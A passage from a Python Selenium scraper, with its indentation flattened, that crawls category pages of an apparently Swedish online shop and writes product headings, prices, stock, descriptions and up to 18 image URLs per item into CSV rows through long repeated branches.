child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
self.loggger.info('error')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
csv_stock = ''
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list3[k] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(
k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
